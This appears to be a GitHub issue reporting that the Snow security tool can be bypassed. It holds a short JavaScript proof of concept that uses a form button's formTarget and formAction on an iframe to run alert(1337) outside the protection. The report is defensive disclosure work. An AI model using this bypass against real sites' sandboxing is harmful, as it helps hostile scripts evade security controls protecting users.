Skip to content

Snow can be bypassed with forms and buttons formAction #153

@hackvertor

Description

@hackvertor
setInterval(x=>xyz.alert(1337),0);
i=document.createElement('iframe');
i.name='xyz';
f=document.createElement('form');
b=document.createElement('button');
b.formTarget='xyz';
b.formAction='1';
f.append(b);
document.body.append(f);
document.body.append(i);
b. click()

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions